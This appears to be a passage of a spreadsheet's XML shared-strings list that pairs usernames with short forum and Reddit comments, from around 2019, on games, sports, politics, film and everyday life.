    <t>Cloud9cali</t>
  </si>
  <si>
    <t>Measure twice, cut once.</t>
  </si>
  <si>
    <t>itsthecurtains</t>
  </si>
  <si>
    <t>Yes it is, though I didn’t know if you needed a single word.</t>
  </si>
  <si>
    <t>Burnnoticelover</t>
  </si>
  <si>
    <t>You can keep them, you just have to put them in a blind trust, which he didn’t.</t>
  </si>
  <si>
    <t>&gt;&gt;95934516 there is a snowbelt and a sunbelt, whats the part in the middle called? rustbelt?</t>
  </si>
  <si>
    <t>wintersyear</t>
  </si>
  <si>
    <t>&gt; Point one: The digivolving sound from Digimon is used in the movie Crowley. So I guess connecting to a haywire software system means he digivolved. Or you're reaching for straws. This isn't a very good analogy. For one thing, both *Turn A* and *Wing* are part of the same franchise.</t>
  </si>
  <si>
    <t>lrkr486</t>
  </si>
  <si>
    <t>You talm bout the constitution b? Beast of a paper, read it like 20 times aks jay</t>
  </si>
  <si>
    <t>SoundMerc</t>
  </si>
  <si>
    <t>That bridge will turn the tides of the game entirely! It's great if you're milling about on the grown below and the last gem you need falls off of a guy on the bridge and lands right in front of you. Terrible if you're bridge guy.</t>
  </si>
  <si>
    <t>Bobsdower</t>
  </si>
  <si>
    <t>Michael Caine and Helen Mirren would be a fantastic Duo for something like this.</t>
  </si>
  <si>
    <t>oneeyedwarf</t>
  </si>
  <si>
    <t>Sounds like a *weiner* name to me.</t>
  </si>
  <si>
    <t>ColinS</t>
  </si>
  <si>
    <t>I was seventeen when the first Star Wars movie was released, so they have all been a part of my life, but perhaps you would enjoy them on Netflix, if they are available?</t>
  </si>
  <si>
    <t>captainwoozy</t>
  </si>
  <si>
    <t>The red makes this perfect</t>
  </si>
  <si>
    <t>Reddits_For_NBA</t>
  </si>
  <si>
    <t>What interviews will ever have someone say that someone is actually a bad teammate? That RARELY happens. But interviews from Nash, Kobe, Mike D’Antoni, SVG all get as close as you can to saying “we did not enjoy playing with or coaching Dwight”</t>
  </si>
  <si>
    <t>Ricoh2A03</t>
  </si>
  <si>
    <t>Fuck them for telling the truth?</t>
  </si>
  <si>
    <t>didlofullbody</t>
  </si>
  <si>
    <t>Things we do in the name of hormones...</t>
  </si>
  <si>
    <t>Chancelley</t>
  </si>
  <si>
    <t>I like your word play and the way you stretch and exaggerate your words, great tone and energy keep it up</t>
  </si>
  <si>
    <t>TraitorComrade_Trump</t>
  </si>
  <si>
    <t>Meanwhile, in the United States, where if a crowd of protestors was beating the police they would all be mowed down with automatic weapons... The amount of outrage here is pretty wild, coming mostly from a country that has nowhere near the population, has no citizen body that is capable of holding or sustaining a protest of this size for this long over any cause at all, and has a serious gun problem of its own. But damn The Other Guy's Man, get your pitchforks!</t>
  </si>
  <si>
    <t>poohster33</t>
  </si>
  <si>
    <t>That must be why they own so much Trump property.</t>
  </si>
  <si>
    <t>Coolgeek71</t>
  </si>
  <si>
    <t>That was something they did with Android Pie for all phones. The notch has nothing to do with it. In fact, the 3 XL can't display 4 icons.</t>
  </si>
  <si>
    <t>HappyFourEwe</t>
  </si>
  <si>
    <t>I started wearing a ring. I've never worn jewelry of any sort. I've tried wearing watches once or twice but just couldn't do it for long. I've got something against accessorizing or 'pointless' decoration. I got hit with an anxiety attack, pretty much out of nowhere. That led to an anxious few weeks and one or two additional attacks. My family doctor hooked me up with some really solid advice and a prescription for 10 Xanax, in case I needed one. I think I took about 5 of them and the other five are in my medicine cabinet in case it comes back. The idea for the ring was my own, based on something he said. It's a simple band with an interesting texture and it's a semi-constant minor distraction. It's a physical thing I can poor my attention into if I need to be distracted from other thoughts. If I feel a fluttering or tightening in my stomach or if those racing thoughts start to come on then I just grab the ring with my other hand, twist it around my finger, feel the bumps on it, think about where I bought it, what it cost, whether I should have got the other one instead, why it is I don't like rings or any other jewelry, who made it, whether or not they like their job, whether I'd like their job, that I should look up how rings are even made, and what was I doing a minute ago? Dang, spaced out... I need to get back to work.</t>
  </si>
  <si>
    <t>Dartego</t>
  </si>
  <si>
    <t>&gt;if women were Thanos snapped off the face of the earth tomorrow, men would do just fine until the end of their lives If all the men disappeared, at best the quality of life for the women left would deteriate significantly. If women would die humanity will go extinct . If men would die. Women will be able to repopulate earth thanks to sperm banks.</t>
  </si>
  <si>
    <t>raven00x</t>
  </si>
  <si>
    <t>They're likely a member of a fundamentalist sect (more cult, but what ever) that equates wealth and power with how much god favors you. In their view Trump is God's chosen because he has billions of dollars in wealth (allegedly) and lots of power as president. Jimmy Carter doesn't have obscene amounts of money and no power, so he's fallen from gods good graces and should be shunned. It's kinda gross and the opposite of what Christ taught.</t>
  </si>
  <si>
    <t>EnemyX3Z</t>
  </si>
  <si>
    <t>I saw this episode of SVU and Dean Cain was a rapist ................... on the show.</t>
  </si>
  <si>
    <t>BullTopia</t>
  </si>
  <si>
    <t>LMAO. I just choked on my taco reading your comment; I honestly do not care upvotes/downvotes/slantvotes/sidevotes/bentvotes. All the earlier spools from Overture were wound nicely and came out looking great. This ONE spool, ahhhhh fuck it...I am going back to eating.</t>
  </si>
  <si>
    <t>The_Syndic</t>
  </si>
  <si>
    <t>My favourite movies full stop.</t>
  </si>
  <si>
    <t>J-C-M-F</t>
  </si>
  <si>
    <t>Box clearly says $69.99. Where I work, if it doesn't ring up at that price, it's free. To be helpful though, finding the box in mint condition is a hard find. Still have my original game bought brand new at release. If I knew how much of a collectors value this game would have had, I would have never let my friends borrow it. They completely ruined my scratch n sniff cards. My box is in decent condition but hardly Mint. Oh the regret. Would never sell it but still.</t>
  </si>
  <si>
    <t>DelfonicSonic</t>
  </si>
  <si>
    <t>The US has cities with bigger populations than the vast majority of those countries. Pretending like they're comparable is ridiculous. The daily ridership for the NYC Subway is higher than the entire population of Finland.</t>
  </si>
  <si>
    <t>Lazy_Responsibility</t>
  </si>
  <si>
    <t>yeah he’s based in a radio broadcast room in Germany watching over the American journalist to make sure she doesn’t say anything stupid on air! (and not doing a very good job...)</t>
  </si>
  <si>
    <t>redditgibbous</t>
  </si>
  <si>
    <t>http://www.museumofpinball.org/events/pinball-madness-oct-18-20-2019/</t>
  </si>
  <si>
    <t>xdanishgamerz</t>
  </si>
  <si>
    <t>Nobody forces you to watch it?</t>
  </si>
  <si>
    <t>Alreadylostinterest</t>
  </si>
  <si>
    <t>Oh shit. I literally just played this scinerio in my head today. Fuck me. Or you're saying this so I think I've missed something when in fact you did misunderstand! Haha! Never go in against a Sicilian when death is on the line!</t>
  </si>
  <si>
    <t>tres borrachos</t>
  </si>
  <si>
    <t>Originally Posted by Rogue Valley Justice Dept. must turn over material related to Mueller grand jury, judge rules The law triumphs. The stonewallers lose another round in court. She has to be one of them activist judges. They are all against Trump. It's a coup!</t>
  </si>
  <si>
    <t>bakingfan80</t>
  </si>
  <si>
    <t>You set your own boundaries. It's ok to be uncomfortable. Don't let other people dictate what you should feel. Communicate your wants, needs and discomforts openly to avoid misunderstandings</t>
  </si>
  <si>
    <t>Highlander-Senpai</t>
  </si>
  <si>
    <t>You're reading it wrong. Most of the time, D&amp;D's combat is determined when you made your character sheet, and how well you roll. It doesn't matter much how well you apply it, because there isn't much in the way of shaking up conditions to apply an advantage. The focus on melee means cover is rarely used, spells can end a fight just by pointing and hoping they roll bad on a save. Fighters just want to stand still and swing their weapon. Not every tabletop RPG has this problem. But Dungeons and Dragons as well as those that are closely based off of it, do.</t>
  </si>
  <si>
    <t>If this is a dank meme, **Updoot** this comment! If this is not a dank meme, **Downdoot** this comment! If this post breaks the rules, **report** it and **Downdoot** this comment! ^Thank ^you ^for ^helping ^us ^in ^keeping ^/r/dankmemes ^dank. [^Hit ^us ^up](https://www.reddit.com/message/compose?to=/r/dankmemes) ^if ^you ^have ^any ^questions. ^( ^I'm ^a ^bot)</t>
  </si>
  <si>
    <t>lilshitfuck</t>
  </si>
  <si>
    <t>depends on the girl ig</t>
  </si>
  <si>
    <t>Evergreen</t>
  </si>
  <si>
    <t>Franklin7268 said: ↑ Hello fellow 3'ers. Tesla updated their model 3 Car kew fob to now auto open and lock when u walk up to car. My question: anybody know if the original key fob get this feature too? I just bought one a few weeks ago but they were specific that it does not have passive entry. Hoping it gets the new feature thru software update??? Thoughts You have 30 days to return unopened accessories, so you could return and get the new one.</t>
  </si>
  <si>
    <t>DLNphotos</t>
  </si>
  <si>
    <t>Astro modded can be different depending on what company you go through to get your camera converted. As for my camera they installed dampeners to help decrease vibration during DSO imaging that way if your using a large telescope the chances of your images being ruined by movement is decreased. Also they remove the AA filter so the image quality is sharper, and lastly they installed a sensor cooler that helps the sensor stay cool during long exposures which in turn can help eliminate noise buildup.</t>
  </si>
  <si>
    <t>LudwigBastiat</t>
  </si>
  <si>
    <t>If someone tries to kill you, you can try to not get killed. Aka you can shoot them.</t>
  </si>
  <si>
    <t>psychedelicow</t>
  </si>
  <si>
    <t>this man is asking the real questions</t>
  </si>
  <si>
    <t>Nibesking</t>
  </si>
  <si>
    <t>They could have been younger specimens. The cap wasn’t fully open. (Best case scenario) Don’t order Amanitas. So many things to go wrong.</t>
  </si>
  <si>
    <t>DenverBowie</t>
  </si>
  <si>
    <t>What's the M for in that acronym?</t>
  </si>
  <si>
    <t>Carpet_Viper</t>
  </si>
  <si>
    <t>I'll test it now.</t>
  </si>
  <si>
    <t>join_the_bandwagon</t>
  </si>
  <si>
    <t>all i want is for juice to be healthy and a richie james backflip v formation</t>
  </si>
  <si>
    <t>Nick McComb</t>
  </si>
  <si>
    <t>" Received as ordered in timely fashion. Price was competitive. Will continue to do business with Tapemonster! Thanks guys! "</t>
  </si>
  <si>
    <t>Mos-EisIey</t>
  </si>
  <si>
    <t>I’m legit play Titan as my main bro and I can tell by your reply you play Titan as well so how about you take the post as what it is, a MEME.</t>
  </si>
  <si>
    <t>Spooky_SZN</t>
  </si>
  <si>
    <t>yeah that kinda bothered me, I mean it wasn't overt as in they didn't show people protesting before but there were clear signs and reports on the news talking about the city going to shit over and over and over again before he was the catalyst for the protests and joker masks. Really annoying thing to constantly have as a negative the movie \*didnt\* do when it absolutely did do it.</t>
  </si>
  <si>
    <t>galaticB00M12</t>
  </si>
  <si>
    <t>To all people who make themselves small in PvP VR games: Fuck you</t>
  </si>
  <si>
    <t>lilesthobo</t>
  </si>
  <si>
    <t>Thank you for taking the time to respond. I’m really starting to see benefits of fasting. I am taking it kinda slow. Today is the second day I’ve tried in my life. I feel like some of the low blood sugar issues may get better with time. I also have a bit of reflux. Any advise? Maybe just wait it out and it’ll get better with subsequent fast periods? All in all I’d say I’m an instant convert to fasting</t>
  </si>
  <si>
    <t>TheConundrum98</t>
  </si>
  <si>
    <t>a very English name and a very German surname</t>
  </si>
  <si>
    <t>JasonBerk</t>
  </si>
  <si>
    <t>You can't have a valid dental check-up without x-rays...why?</t>
  </si>
  <si>
    <t>Katze10-0-10</t>
  </si>
  <si>
    <t>It would be a neat way to defend your base.</t>
  </si>
  <si>
    <t>Kampfarsch</t>
  </si>
  <si>
    <t>yeah give them money for not punching kids at school because being a decent human being cant be seen as the standard</t>
  </si>
  <si>
    <t>Kote-</t>
  </si>
  <si>
    <t>Remember, intense danger may fill the void inside you!</t>
  </si>
  <si>
    <t>The1DragonSlayer</t>
  </si>
  <si>
    <t>I’m not saying there won’t be, in fact I’m hoping they’ll come out in December to show us something, but if the game is getting a trailer at the game awards in a few months, then how the fuck are they gonna manage to release it in early 2020? I understand that there have been leaks and while many of them are completely true, I can’t help but wonder if someone sprinkled in a few lies to make the leaks seem more legit... Plus have never (rarely) heard or seen a AAA game get a release date so soon after it’s debut gameplay trailer. If it is launching in a few months from now, then the guys at Bamco better make damn sure to market and promote the hell out of this game.</t>
  </si>
  <si>
    <t>fersure4</t>
  </si>
  <si>
    <t>Love the animal kingdom and blizzard beach one. Dont think 3 stops at all stars would be the beat though</t>
  </si>
  <si>
    <t>Tatianus_Otten</t>
  </si>
  <si>
    <t>Nah fam, the contract says at Blizzard's discretion. They can pick and choose what they agree with.</t>
  </si>
  <si>
    <t>adbaslisau</t>
  </si>
  <si>
    <t>It’s true it may be exaggerated to serve a purpose of narrative and emotion, but shit, ever read a paper? Can we not use the same ironic tactics to highlight the inequalities in the world at the moment? Or should we just blame the 16 year olds?</t>
  </si>
  <si>
    <t>chad2badd4life</t>
  </si>
  <si>
    <t>You could honestly play either and be fine. If youre not feeling Allen play Gallup. End of the day its your team, do what makes you feel good.</t>
  </si>
  <si>
    <t>darkhero7777</t>
  </si>
  <si>
    <t>Haunted tysm!</t>
  </si>
  <si>
    <t>geniusboy91</t>
  </si>
  <si>
    <t>Wow, I list 3 things and feel like I need a nap.</t>
  </si>
  <si>
    <t>CyclonicTaurus</t>
  </si>
  <si>
    <t>Me and my polish best friend talk in the shittiest polish accent</t>
  </si>
  <si>
    <t>ajw22</t>
  </si>
  <si>
    <t>Hold down the MORE button until the lights begin blinking and release it. When the lights stop blinking the % LEDs show the usage briefly then go back to normal display. If your usage display is the same as your % output setting it will look like nothing new is being displayed. Set the % so no LEDs are displayed and then the usage lights become clearer.</t>
  </si>
  <si>
    <t>latotokyo123</t>
  </si>
  <si>
    <t>The thought of Kuz with this current bench is great, need someone who can score at will to fill in some weaknesses.</t>
  </si>
  <si>
    <t>LCinEB</t>
  </si>
  <si>
    <t>Sorry for the late reply. The straps were all snug when I tried them on. I think the issue is just that I'm wearing the wrong style bra.</t>
  </si>
  <si>
    <t>dexterbateman</t>
  </si>
  <si>
    <t>Firing up El Camino. Let's fucking go!</t>
  </si>
  <si>
    <t>twasjustbantar</t>
  </si>
  <si>
    <t>If you plan on collecting the pre-mades I'd recommend doing it before opening any packs as you'll have the legendary protection for Martin and Mankar.</t>
  </si>
  <si>
    <t>MrBaracus</t>
  </si>
  <si>
    <t>lurkeraspect84 said: ↑ 3...2...1... he responds by insulting me or UK/Cal. It's the path of the least resistance and some ppl aren't that bright. Let's be honest here. Click to expand... You can say that again. I wonder which category the Dynamic Duo fit into. I’ve never played the victim card in any way. It’s called explaining and offering perspective. But of course it’s lost on you two. Maybe someday...</t>
  </si>
  <si>
    <t>73Scamper</t>
  </si>
  <si>
    <t>Women are idealized and men demonized, social movements have changed radically with the internet and femenism and pro-women movements took over massively. If you don't actively support women you're a sexist, but if you don't actively support men it's just normal (and in some cases supporting men makes you sexist). Men really just don't win there.</t>
  </si>
  <si>
    <t>Frond_Dishlock</t>
  </si>
  <si>
    <t>Blood and Black Lace (1964)</t>
  </si>
  <si>
    <t>Danishschmitz</t>
  </si>
  <si>
    <t>&gt; I don’t think doing a fasted 20 miles is a great idea. Yeah, I know shit all about running, but I really like doing it. I've done fasted cardio before with great results. Bicycling for a couple of hours with a thermos full of yerba mate is pretty tight. Walking around for days fasted works too in my experience, but I hit the "wall" after one energy drink. We'll see, bro. I'll post an update on my experience</t>
  </si>
  <si>
    <t>TomCruiseFor2020</t>
  </si>
  <si>
    <t>Yes it’s the best budget but it doesn’t touch Samsung/LG OLED. Also use an actual Apple TV 4K and the UI and functionality is 100x better</t>
  </si>
  <si>
    <t>spicewoman</t>
  </si>
  <si>
    <t>Er, I was raised religious, if I meet someone who has the same religion that I did, it's not an "inability to see things from their perspective" that makes me now disagree with them. Same for astrology. I feel like I have a pretty good understanding of the psychological reasons that people find it intriguing. Just because I can understand the "reasons" that someone might be an anti-vaxxer, doesn't mean I'd want to date one, or that it would be somehow "mature" of me to do so.</t>
  </si>
  <si>
    <t>Maggie Owensby</t>
  </si>
  <si>
    <t>Thank you all so much! I appreciate all of the help and will post a photo once I make my decision :) sooo many lovely options</t>
  </si>
  <si>
    <t>It’s a minor adult.</t>
  </si>
  <si>
    <t>Glaciata</t>
  </si>
  <si>
    <t>Rifle is damned fine. Great work Ivan.</t>
  </si>
  <si>
    <t>adayinalife</t>
  </si>
  <si>
    <t>At that budget I would just stick to a headphone amp, like a Schiit Magni. That's barely enough money for an amp, let alone one with an ok headphone out.</t>
  </si>
  <si>
    <t>Kozkoz82</t>
  </si>
  <si>
    <t>For what a quest step?</t>
  </si>
  <si>
    <t>Tamaaas</t>
  </si>
  <si>
    <t>Great, clean editing and to the point. As another person said, personally not my favorite sort of DnB but surprisingly I liked it. Intro was just long enough, though I think you could have a couple seconds of silence or fade-in there at the start. I'm also not a fan of dubbing in caster reactions but I'm glad you used them sparingly. All in all, good work.</t>
  </si>
  <si>
    <t>Too_many_pets</t>
  </si>
  <si>
    <t>There can be only one.</t>
  </si>
  <si>
    <t>D1ckLaw</t>
  </si>
  <si>
    <t>Starting Bamford ahead of him is like playing Giroud when you have Aubameyang on the bench.</t>
  </si>
  <si>
    <t>mobott</t>
  </si>
  <si>
    <t>They talked about it on the last dev stream, it's a new slot. Also FYI, once you've forma'd something, you can use the "Swap Polarity" to move the polarities around.</t>
  </si>
  <si>
    <t>average_white_male</t>
  </si>
  <si>
    <t>Wooo baby! Look out 49ers fans, don't expect those top defensive performances to continue Monday night with us almost fully armed on offense. They need their 3rd and 4th CBs to step up big time!</t>
  </si>
  <si>
    <t>6t5g</t>
  </si>
  <si>
    <t>They use staples to hold the insole to the last. It shouldn’t be bothering your foot. You can push down the bumps or have a cobbler do it. Talk to red wing CS and see what they say.</t>
  </si>
  <si>
    <t>My windows are under construction at the moment. But this is it pretty much. Lake and woods.</t>
  </si>
  <si>
    <t>Jordan3399</t>
  </si>
  <si>
    <t>Tough one to bet. I'll take a stab at Andrews. I'm not really liking any other dogs. I do think Rashid and Harrison probably have some value.</t>
  </si>
  <si>
    <t>diggitydev</t>
  </si>
  <si>
    <t>my birthday is 3/20, the last day of pisces. I didn’t find out my sun was in Aries until a few months ago! &amp; since I’ve only known myself to be a Pisces, I still claim pisces! I got my tarot cards read &amp; the man asked my birthday,He said upon meeting me he could see the headstrong &amp; determined traits but that my “Pisces jumps out” I feel more pisces if that makes sense lol, whenever I try to identify w Aries it feels like I try to overrelate &amp; try to fit it into my life. While when I identify w pisces, it tells me ab my life if that makes any sense at all</t>
  </si>
  <si>
    <t>&gt;&gt;268800708 imagine being this butthurt that every single trailer has failed to confirm anything of substance and just keeps shoving this awful new aesthetic in our faces</t>
  </si>
  <si>
    <t>biggs54</t>
  </si>
  <si>
    <t>She is the Boba Fett of the sequels. At least there is consistency.</t>
  </si>
  <si>
    <t>&gt;&gt;268629326 No i'm going to spoil the game for people.</t>
  </si>
  <si>
    <t>Brigadier_Bishy</t>
  </si>
  <si>
    <t>I never had it on to begin with!</t>
  </si>
  <si>
    <t>saulsa_</t>
  </si>
  <si>
    <t>Make good on my promise of physical violence.</t>
  </si>
  <si>
    <t>daniel_crk</t>
  </si>
  <si>
    <t>Yes, people are being banned left and right!</t>
  </si>
  <si>
    <t>Pookle123</t>
  </si>
  <si>
    <t>I read them and there wasn't statistical evidence to prove the number of jewish lawyers in the whole lawyer population which makes your evidence invalid. It seems like you forget the other people who died in the holocaust</t>
  </si>
  <si>
    <t>Raoh90</t>
  </si>
  <si>
    <t>damn, you must be dying a lot to be level 5 inside 2.5 hours. I do remember i did died once, and because i disliked doing the whole journey back to the city i bought some medicine herbs and I would never let myself get killed again, instead i'd try to flee if things went bad. And i remember the blue guys hopping in the boots give a lot of experience. Anyways, all i can tell you is that only the beginning felt hard, aside from there i've been managing the next bosses without a sweat. And it's been a great experience. But i'd say you really gotta like RPG's.</t>
  </si>
  <si>
    <t>ArcticCactie</t>
  </si>
  <si>
    <t>Are you calling me a whacko for tasting my own blood occasionally? You flatter me</t>
  </si>
  <si>
    <t>busybee2005</t>
  </si>
  <si>
    <t>How do you explain the existence of Karens?</t>
  </si>
  <si>
    <t>jyoung_phd</t>
  </si>
  <si>
    <t>Hello. I currently am using the EVGA Black Gaming GeForce RTX 2080 Ti With a Vizio P55-F1 tv. When gaming in with HDR enabled, I get a screen flicker on the left side of my tv screen. It’s connected via HDMI in port 2. Running an i5-6600K with 16gb ram and a 256 m.series drive. I have done multiple driver installs using DDU. Did a fresh Windows 10 install also. Still the issue is occurring. Tried accessing NVCP and dropping my tv screen’s hertz to 59 from 60 with no luck. Tried running in RGB mode with Full dynamic range, no luck. Ran 4.4.4 Chroma. Ran 4.2.0 chroma. Still, no luck getting rid of the flicker. Tried changing options in the Vizio P series with the Active Full Array by turning it off and no luck there either. I am STUMPED. Anyone have any ideas they could brainstorm to me with? Any help would be appreciative.</t>
  </si>
  <si>
    <t>garriusbearius</t>
  </si>
  <si>
    <t>Or last December when he had about eight different dates for the Endgame trailer?</t>
  </si>
  <si>
    <t>Yup, look at the table and plate. Na trapic siguro sa edsa</t>
  </si>
  <si>
    <t>TheGoatPuncher</t>
  </si>
  <si>
    <t>True, some are good but you have to go to a pretty high level to encounter those guys (kinda by definition I suppose). I'm plat so they're bad almost sans exception :D</t>
  </si>
  <si>
    <t>Draxion23</t>
  </si>
  <si>
    <t>This entire sub should be renamed to r/CleverComebacks</t>
  </si>
  <si>
    <t>IndigoWyrd</t>
  </si>
  <si>
    <t>Burke said: All about the system map reveal. Not really. Flat 2d map is flat 2d map. I only use it when I can't remember which planet had the geological or biological POI's I wanted to investigate, and even then it's just to see which ones were where.</t>
  </si>
  <si>
    <t>AGiantNun</t>
  </si>
  <si>
    <t>Honestly? I think that it would lead to a confronatation between armed officers in federal buildings. As of now, this is all still at the optics stage because The Turtle will never bring it to the senate. No need to start an actual war just yet.</t>
  </si>
  <si>
    <t>PositivityPicks</t>
  </si>
  <si>
    <t>lol "pay the consequences"</t>
  </si>
  <si>
    <t>Teleo</t>
  </si>
  <si>
    <t>Fairly certain I didn’t go into my entire history of drug use/abuse on a funny thread</t>
  </si>
  <si>
    <t>Daankeykang</t>
  </si>
  <si>
    <t>Not a fan. Removes a lot of physical interaction with the NPCs. I know they're static, but most MMO towns are. But they exist to make it feel like a lived in world rather than being on rails for your gameplay.</t>
  </si>
  <si>
    <t>Requesting Helena Douglas ( DoA ) and Elizabeth (KOF) wearing their tight white leggings and jacket outfits posing like in the reference with Ash and Zack taking photos to their butts exposed.</t>
  </si>
  <si>
    <t>Jonathan-JoJo</t>
  </si>
  <si>
    <t>The heavies are risky, but quite rewarding, and you don’t appear annoying to the opposing player by not lightspamming haha</t>
  </si>
  <si>
    <t>NJ_Yankees_Fan</t>
  </si>
  <si>
    <t>&gt; We're definitely not the most *gentile* fan base in the world Yeah, plenty of this fanbase is Jewish</t>
  </si>
  <si>
    <t>remiel</t>
  </si>
  <si>
    <t>Hi `DragonPup`. Thank you for participating in /r/Politics. However, [your submission](https://www.reddit.com/r/politics/comments/dhxjd6/-/) has been removed for the following reason(s): * [Off-Topic](https://www.reddit.com/r/politics/wiki/index#wiki_the_.2Fr.2Fpolitics_on_topic_statement): All submissions to /r/politics need to be explicitly about **current US politics**. **If you have questions as to why your post has been removed, please see here: [Why was my post removed as Off-Topic?](https://www.reddit.com/r/politics/wiki/index#wiki_why_was_my_post_removed_as_off-topic.3F)** If you have any additional questions about this removal, please feel free to [message the moderators.](https://www.reddit.com/message/compose?to=/r/politics⊂ject=Question regarding the removal of this submission by /u/DragonPup&amp;message=I have a question regarding the removal of this [submission.](https://www.reddit.com/r/politics/comments/dhxjd6/-/?context=10000\))</t>
  </si>
  <si>
    <t>Akrius_Finch</t>
  </si>
  <si>
    <t>Never watched the 2 bottom right ones, sadly</t>
  </si>
  <si>
    <t>Shuden</t>
  </si>
  <si>
    <t>Official sources put Yajirobe at over 900 PL. That's over 3x King Piccolo. So yeah, I was wrong, Yajirobe IS moon+ destroyer and maybe even planet level.</t>
  </si>
  <si>
    <t>Hi there! Your post was removed because it uses the body text box. You can only use the title field to post a question in AskReddit. Per [rule 1](/r/AskReddit/wiki/index#wiki_-rule_1-), use of the body text box is prohibited. You can resubmit your post [here]() without the textbox. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskReddit) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>&gt;&gt;42780650 Get of 4chan, grandpa</t>
  </si>
  <si>
    <t>&gt;&gt;228689638 we colonize the moon to learn how to colonize off planet we colonize mars to learn how to terraform a planet we colonize enceladus because it has water we colonize titan because cheap fuel we become a true system based race and begin branching out from there</t>
  </si>
  <si>
    <t>plunderfromthebottom</t>
  </si>
  <si>
    <t>The god of the Kool Kids Klub, obviously for all those who can’t tell.</t>
  </si>
  <si>
    <t>LaCoffeeNostra</t>
  </si>
  <si>
    <t>If they did get away though, it's not like Tone would make his decision to whack Jackie based on Chrissy's take on the situation.</t>
  </si>
  <si>
    <t>**Attention! [Serious] Tag Notice** * Jokes, puns, and off-topic comments are not permitted in **any** comment, parent or child. * Parent comments that aren't from the target group will be removed, along with their child replies. * Report comments that violate these rules. Posts that have few relevant answers within the first hour, and posts that are not appropriate for the [Serious] tag will be removed. Consider doing an AMA request instead. Thanks for your cooperation and enjoy the discussion! *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskReddit) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>slayerment</t>
  </si>
  <si>
    <t>Whatever the case may be, move government is obviously the only solution.</t>
  </si>
  <si>
    <t>thegreatvortigaunt</t>
  </si>
  <si>
    <t>Haha what a shock, you failed to address anything I said and proved me 100% right. Maybe don't get so angry and upset when people easily guess your race and class online, okay buddy? That's it, keep obeying like a good obedient little American citizen you are :)</t>
  </si>
  <si>
    <t>libvn</t>
  </si>
  <si>
    <t>Whats more embarrassing, losing to GRF. The 2nd seed from Korea. Twice in a stomp and beating them once. Or losing twice to PVB a wild card team from Vietnam. Stop over reacting.</t>
  </si>
  <si>
    <t>doctordoom90s</t>
  </si>
  <si>
    <t>People can ask for what they want. It's because of the community feedback that we had things like shirtless David. How does that offend you in any way? Would you be offended if people asked for bikini Kate as well? No need to get deffensive and be rude here.</t>
  </si>
  <si>
    <t>slurpthis</t>
  </si>
  <si>
    <t>I generally pay very little attention to commentating but the last Collinsworth Pats game was so bad I had to mute a game for the first time due to commentating.</t>
  </si>
  <si>
    <t>Emz0711</t>
  </si>
  <si>
    <t>In reply to Calba 19 hours ago Any other pics? Another Pic x x</t>
  </si>
  <si>
    <t>dawnandnightfall</t>
  </si>
  <si>
    <t>Took this on 10/15/19 (after Typhoon Hagibis) during my Japan Trip. The Tateyama Kurobe Alpine Route.</t>
  </si>
  <si>
    <t>ArryPotta</t>
  </si>
  <si>
    <t>Way to stick it to them by buying a ticket to the virtual event...</t>
  </si>
  <si>
    <t>Sith_Sensei__Prime</t>
  </si>
  <si>
    <t>https://deadline.com/2019/10/venom-...villain-woody-harrelson-tom-hardy-1202759702/ I'm completely unfamiliar with Shriek but from the article she sounds like the sort of character that will let them add some different kinds of action sequences beyond muscle-bound slime smashing stuff.</t>
  </si>
  <si>
    <t>occupynewparadigm</t>
  </si>
  <si>
    <t>Trump has most certainly exposed the media and dnc. They keep making him right. It's painful to see.</t>
  </si>
  <si>
    <t>wednesdayware</t>
  </si>
  <si>
    <t>Is there a lack of good agricultural land in Canada?</t>
  </si>
  <si>
    <t>JohnnySixguns</t>
  </si>
  <si>
    <t>I'd also argue it's a product of what you and your fellow citizens consume in your nation's media. Your media probably only reports what our media reports - which has been, hands down, the most biased and unfair media coverage in my lifetime. I'm 50 years old. Not sure how many years that is in metric.</t>
  </si>
  <si>
    <t>MisterFalcon7</t>
  </si>
  <si>
    <t>A&amp;M definitely got built-in poll inertia to help it out.</t>
  </si>
  <si>
    <t>CorporateBolshevik</t>
  </si>
  <si>
    <t>With takes this hot, I should really open a Twitter account.</t>
  </si>
  <si>
    <t>arutemitsu</t>
  </si>
  <si>
    <t>So fluffy are both! Cute mama and baby!</t>
  </si>
  <si>
    <t>SalvageET</t>
  </si>
  <si>
    <t>That facebook post is so shitty that I want to downvote this post</t>
  </si>
  <si>
    <t>DjOneOne</t>
  </si>
  <si>
    <t>You must perform a sacrificial ritual in the honor of Dean Boyer, the law of equivalent exchange. In the name of our bike riding savoir, amen.</t>
  </si>
  <si>
    <t>Spriggs5</t>
  </si>
  <si>
    <t>I don't care about his base games mechanics. Damaging foes should raise it a little and getting hit should drop it a little and he shouldn't get any meter filled after dying. Joker shouldn't be rewarded for losing when rage is already a mechanic and down b at the right time basically can get it for him for free.</t>
  </si>
  <si>
    <t>leviathing</t>
  </si>
  <si>
    <t>Uncle justice. I fucking love it.</t>
  </si>
  <si>
    <t>mistersmith_22</t>
  </si>
  <si>
    <t>- Leviathan deck with a sniper - EP wave 2 - Cruise around Harbor and kill Nightmares</t>
  </si>
  <si>
    <t>skellez</t>
  </si>
  <si>
    <t>The rule wasn't active then, if it had been Radioactive wouldn't have passed 56 weeks I believe, beacuse everything after that was in the 30s range</t>
  </si>
  <si>
    <t>QuasarKiller666</t>
  </si>
  <si>
    <t>Five Guys on the West Coast is run by completely different management on the West Coast than on the East Coast. As someone who has tried Five Guys on both sides, I can confirm that FIve Guys is leaps and bounds better on the East Coast. It really sucks in California, where I am. I don't quite remember how East Coast Five Guys compares to In n Out, but as far as I remember, they are pretty comparable.</t>
  </si>
  <si>
    <t>HueyCrashTestPilot</t>
  </si>
  <si>
    <t>I get the feeling that there are simply two different takes on the word 'politics' here. The person you replied to (and the vast majority of other comments in this discussion) seems to be using the word 'politics' to mean 'making a political statement'. Whereas the 'Siege is political' statements are taking it to mean 'politicians would be involved in the lore'.</t>
  </si>
  <si>
    <t>dpw2017</t>
  </si>
  <si>
    <t>And people thought that this was would be an excuse to get bliss over.</t>
  </si>
  <si>
    <t>IK6SPEED</t>
  </si>
  <si>
    <t>H EDIT....also appears the iOS App isnt uploading photos again</t>
  </si>
  <si>
    <t>Retired</t>
  </si>
  <si>
    <t>I bought this light to illuminate my American Flag. Lights up my entire flag and most of surrounding area. Awesome. I've been using pond lights to honor our flag but cost now exceeds $70. As of 10/2/2019 product is on sale at Lowes for 50% less than other sellers.</t>
  </si>
  <si>
    <t>Jimbo_McSteel</t>
  </si>
  <si>
